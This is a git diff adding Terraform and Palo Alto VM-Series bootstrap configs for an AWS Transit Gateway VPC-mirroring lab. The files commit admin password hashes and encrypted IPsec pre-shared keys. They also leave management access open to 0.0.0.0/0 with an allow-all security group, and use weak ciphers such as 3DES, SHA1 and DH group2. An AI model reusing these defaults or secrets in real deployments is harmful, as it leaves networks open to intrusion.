+ + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml new file mode 100644 index 00000000..47244dd3 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/bootstrap.xml @@ -0,0 +1,1018 @@ + + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. 
+ + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB HealthCheck + + up + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + 
allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/nlb.tf b/aws/TGW-VPC-Mirroring/nlb.tf new file mode 100644 index 00000000..3835c45f --- /dev/null +++ b/aws/TGW-VPC-Mirroring/nlb.tf @@ -0,0 +1,39 @@ +resource "aws_lb" "mirror-lb" { + name = "mirror-lb-tf" + internal = true + load_balancer_type = "network" + subnets = ["${aws_subnet.vpc_mirror_pub_1.id}","${aws_subnet.vpc_mirror_pub_2.id}"] + + enable_deletion_protection = false + enable_cross_zone_load_balancing = true + tags = { + } +} +resource "aws_lb_target_group" "mirror-target" { + name = "mirror-target" + port = 4789 + protocol = "UDP" + vpc_id = "${aws_vpc.vpc_security.id}" + health_check { + port = 80 + protocol = "HTTP" + } +} +resource "aws_lb_listener" "mirror-listener" { + load_balancer_arn = "${aws_lb.mirror-lb.arn}" + port = "4789" + protocol = "UDP" + + default_action { + type = "forward" + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + } +} +resource "aws_lb_target_group_attachment" "mirror1" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw3.instanceid}" +} +resource "aws_lb_target_group_attachment" "mirror3" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw4.instanceid}" +} \ No newline at end of file diff --git a/aws/TGW-VPC-Mirroring/providers.tf b/aws/TGW-VPC-Mirroring/providers.tf new file mode 100644 index 00000000..af7b0ba3 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/providers.tf @@ -0,0 +1,3 @@ +provider "aws" { + region = "${var.aws_region}" +} diff --git a/aws/TGW-VPC-Mirroring/tgw.tf b/aws/TGW-VPC-Mirroring/tgw.tf new file mode 100644 index 00000000..191dce08 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/tgw.tf @@ -0,0 +1,51 @@ +resource "aws_ec2_transit_gateway" "tgw" { + description = "Transit Gateway" + vpn_ecmp_support = "enable" + default_route_table_association = "disable" + default_route_table_propagation = "disable" + dns_support = "enable" + auto_accept_shared_attachments = 
"disable" + + tags { + Name = "transit_gateway" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_security" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-security" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-spokes" + } +} + +resource "aws_ec2_transit_gateway_route" "default" { + destination_cidr_block = "0.0.0.0/0" + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" { + vpc_id = "${aws_vpc.vpc_security.id}" + subnet_ids = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"] + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_security" + } +} diff --git a/aws/TGW-VPC-Mirroring/variables.tf b/aws/TGW-VPC-Mirroring/variables.tf new file mode 100644 index 00000000..80613943 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/variables.tf @@ -0,0 +1,181 @@ +//This section should be verified and modified accordingly. + +variable aws_region { + description = "AWS Region for deployment" + default = "us-east-2" +} + +variable aws_key { + description = "aws_key" + default = "AWS--Key" +} + +//Do not create these. The Terraform will do that. Just need to make secure +//the s3 bucket names are unique. 
+ +variable bootstrap_s3bucket { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-1" +} + +variable bootstrap_s3bucket2 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-2" +} +variable bootstrap_s3bucket3 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-3" +} + +variable bootstrap_s3bucket4 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-4" +} +//End of the section that MUST be modified to work +variable management_cidr { + description = "CIDR Address for Management Access" + default = "0.0.0.0/0" +} + +variable vpc_security_cidr { + description = "CIDR Address for Security VPC" + default = "192.168.0.0/16" +} + +variable vpc_security_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.0/24" +} + +variable vpc_security_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.0/24" +} + +variable fw_ip_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.45" +} + +variable fw_ip_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.45" +} + +variable vpc_security_subnet_tgw_1 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.11.0/24" +} +################# +# Mirror Subnets +################# +variable vpc_mirror_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.0/24" +} +variable vpc_mirror_priv_1 { + description = "CIDR Address for Security VPC" + default = "192.168.52.0/24" +} +variable fw_ip_subnet_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.45" +} +variable fw_ip_subnet_priv_1 { + description = "CIDR Address for Security VPC" + default = "192.168.52.45" +} +variable vpc_mirror_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.0/24" +} +variable vpc_mirror_priv_2 { + description = "CIDR Address for Security VPC" + default = "192.168.62.0/24" +} +variable fw_ip_subnet_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.45" +} +variable fw_ip_subnet_priv_2 { + description = "CIDR Address for Security VPC" + default = "192.168.62.45" +} +############# + + + +variable vpc_security_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.0/24" +} + +variable vpc_security_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.0/24" +} + +variable vpc_security_subnet_tgw_2 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.21.0/24" +} + +variable fw_ip_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.45" +} + +variable fw_ip_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.45" +} + +variable spoke1_cidr { + description = "CIDR Address for Spoke1 VPC" + default = "10.1.0.0/16" +} + +variable spoke1_subnet { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.1.0/24" +} + +variable spoke1_subnet2 { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.2.0/24" +} + +variable spoke1_server { + description = "Server Address for Spoke1 Server" + default = "10.1.1.45" +} + +variable spoke1_server2 { + description = "Server Address for Spoke1 Server2" + default = "10.1.2.45" +} + +variable spoke2_cidr { + description = "CIDR Address for Spoke2 VPC" + default = 
"10.2.0.0/16" +} + +variable spoke2_subnet { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.1.0/24" +} + +variable spoke2_subnet2 { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.2.0/24" +} + +variable spoke2_server { + description = "Server Address for Spoke2 Server" + default = "10.2.1.45" +} + +variable spoke2_server2 { + description = "Server Address for Spoke2 Server2" + default = "10.2.2.45" +} diff --git a/aws/TGW-VPC-Mirroring/vm-series/main.tf b/aws/TGW-VPC-Mirroring/vm-series/main.tf new file mode 100644 index 00000000..12dbc9f7 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vm-series/main.tf @@ -0,0 +1,170 @@ +variable name { + description = "firewall instance name" +} + +variable untrust_subnet_id {} +variable untrust_security_group_id {} +variable untrustfwip {} + +variable trust_subnet_id {} +variable trust_security_group_id {} +variable trustfwip {} + +variable management_subnet_id {} +variable management_security_group_id {} + +variable bootstrap_profile { + default = "" +} + +variable bootstrap_s3bucket {} + +variable tgw_id {} + +variable aws_region {} +variable aws_key {} + +variable instance_type { + default = "m5.xlarge" +} + +variable ngfw_license_type { + default = "payg2" +} + +variable ngfw_version { + default = "9.0" +} + +variable "license_type_map" { + type = "map" + + default = { + "byol" = "6njl1pau431dv1qxipg63mvah" + "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km" + "payg2" = "806j2of0qy5osgjjixq9gqc6g" + } +} + +data "aws_ami" "panw_ngfw" { + most_recent = true + owners = ["aws-marketplace"] + + filter { + name = "owner-alias" + values = ["aws-marketplace"] + } + + filter { + name = "product-code" + values = ["${var.license_type_map[var.ngfw_license_type]}"] + } + + filter { + name = "name" + values = ["PA-VM-AWS-${var.ngfw_version}*"] + } +} + +data "aws_region" "current" { + name = "${var.aws_region}" +} + +resource "aws_network_interface" "eni-management" { + subnet_id = "${var.management_subnet_id}" + security_groups = ["${var.management_security_group_id}"] + source_dest_check = true + + tags { + Name = "eni_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-trust" { + subnet_id = "${var.trust_subnet_id}" + private_ips = ["${var.trustfwip}"] + security_groups = ["${var.trust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_trust" + } +} + +output "eni-trust" { + value = "${aws_network_interface.eni-trust.id}" +} + +resource "aws_eip" "eip-management" { + vpc = true + network_interface = "${aws_network_interface.eni-management.id}" + + tags { + Name = "eip_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-untrust" { + subnet_id = "${var.untrust_subnet_id}" + private_ips = ["${var.untrustfwip}"] + security_groups = ["${var.untrust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_untrust" + } +} + +resource "aws_eip" "eip-untrust" { + vpc = true + network_interface = "${aws_network_interface.eni-untrust.id}" + + tags { + Name = "eip_${var.name}_untrust" + } +} + +resource "aws_instance" "instance-ngfw" { + disable_api_termination = false + instance_initiated_shutdown_behavior = "stop" + iam_instance_profile = "${var.bootstrap_profile}" + user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}" + + ebs_optimized = true + ami = "${data.aws_ami.panw_ngfw.image_id}" + instance_type = "${var.instance_type}" + key_name = "${var.aws_key}" + + monitoring = false + + 
network_interface { + device_index = 1 + network_interface_id = "${aws_network_interface.eni-management.id}" + } + + network_interface { + device_index = 0 + network_interface_id = "${aws_network_interface.eni-untrust.id}" + } + + network_interface { + device_index = 2 + network_interface_id = "${aws_network_interface.eni-trust.id}" + } + + tags { + Name = "${var.name}" + } +} + +output "eip_untrust" { + value = "${aws_eip.eip-untrust.public_ip}" +} + +output "eip_mgmt" { + value = "${aws_eip.eip-management.public_ip}" +} + +output "instanceid" { + value = "${aws_instance.instance-ngfw.id}" +} diff --git a/aws/TGW-VPC-Mirroring/vpc_security.tf b/aws/TGW-VPC-Mirroring/vpc_security.tf new file mode 100644 index 00000000..5ff14424 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vpc_security.tf @@ -0,0 +1,426 @@ +data "aws_availability_zones" "available" {} + +resource "aws_vpc" "vpc_security" { + cidr_block = "${var.vpc_security_cidr}" + + tags { + Name = "vpc_security" + } +} + +resource "aws_subnet" "vpc_security_public_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_public_1" + } +} + +resource "aws_subnet" "vpc_security_public_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_public_2" + } +} +################# +# Mirror Subnets +################# +resource "aws_subnet" "vpc_mirror_pub_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_mirror_pub_1" + } +} + +resource "aws_subnet" "vpc_mirror_priv_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_priv_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_mirror_priv_1" + } +} +resource "aws_subnet" "vpc_mirror_pub_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_mirror_pub_2" + } +} + +resource "aws_subnet" "vpc_mirror_priv_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_priv_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_mirror_priv_2" + } +} +################### + +resource "aws_subnet" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_private_1" + } +} + +resource "aws_subnet" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_private_2" + } +} + +resource "aws_subnet" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_tgw_1" + } +} + +resource "aws_subnet" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_2}" + availability_zone = 
"${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_tgw_2" + } +} + +resource "aws_route_table" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_1" + } +} + +resource "aws_route_table" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_2" + } +} + +resource "aws_route_table" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_1" + } +} + +resource "aws_route_table" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_2" + } +} + +resource "aws_route_table_association" "vpc_security_private_1" { + subnet_id = "${aws_subnet.vpc_security_private_1.id}" + route_table_id = "${aws_route_table.vpc_security_private_1.id}" +} + +resource "aws_route_table_association" "vpc_security_private_2" { + subnet_id = "${aws_subnet.vpc_security_private_2.id}" + route_table_id = "${aws_route_table.vpc_security_private_2.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_1" { + subnet_id = "${aws_subnet.vpc_security_tgw_1.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_2" { + subnet_id = "${aws_subnet.vpc_security_tgw_2.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" +} + +resource "aws_route" "vpc_security_tgw_1_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_1_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_trust_1_0" { + route_table_id = "${aws_route_table.vpc_security_private_1.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_route" "vpc_security_trust_2_0" { + route_table_id = "${aws_route_table.vpc_security_private_2.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_internet_gateway" "vpc_security_igw" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "vpc_securty_igw" + } +} + +resource "aws_route" "vpc_security_default" { + route_table_id = "${aws_vpc.vpc_security.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + gateway_id = "${aws_internet_gateway.vpc_security_igw.id}" +} + +resource "aws_security_group" "allow_all" { + name = "allow_all" + description = "Allow all inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_all_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group_rule" "allow_all_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + 
security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group" "allow_https_ssh" { + name = "allow_https_ssh" + description = "Allow HTTPS and SSH inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_ssh_ingress" { + type = "ingress" + from_port = 22 + to_port = 22 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_https_ingress" { + type = "ingress" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_all" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +module "ngfw1" { + source = "./vm-series/" + + name = "ngfw1" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_1.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_1}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_1 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} + +module "ngfw2" { + source = "./vm-series/" + + name = "ngfw2" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_2.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_2}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_2 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile2.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket2}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} +################### +# VPC Mirror FWs +################### +module "ngfw3" { + source = "./vm-series/" + + name = "ngfw3" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_mirror_priv_1.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_priv_1}" + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_1}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile3.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket3}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} +module "ngfw4" { + source = "./vm-series/" + + name = "ngfw4" + + aws_key = "${var.aws_key}" + + trust_subnet_id = 
